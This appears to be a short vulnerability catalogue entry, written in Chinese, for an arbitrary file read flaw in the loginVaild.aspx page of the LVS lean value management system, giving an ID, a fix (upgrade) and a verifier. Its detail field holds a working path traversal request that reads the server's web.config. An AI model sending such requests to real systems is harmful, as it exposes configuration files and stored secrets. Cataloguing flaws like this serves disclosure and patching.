vendor = "LVS"
name = "LVS精益价值管理系统 loginVaild.aspx 任意文件读取漏洞"
type = "任意文件读取"
path = "/loginVaild.aspx"
version = ""
detail = "GET /loginVaild.aspx?file=../../WEB-INF/web.config HTTP/1.1 Host: target"
fix = "升级至最新版本"
date = 20260415
label = "nday"
cve = "TVD-2026-09864"
verifier = "AdySec"
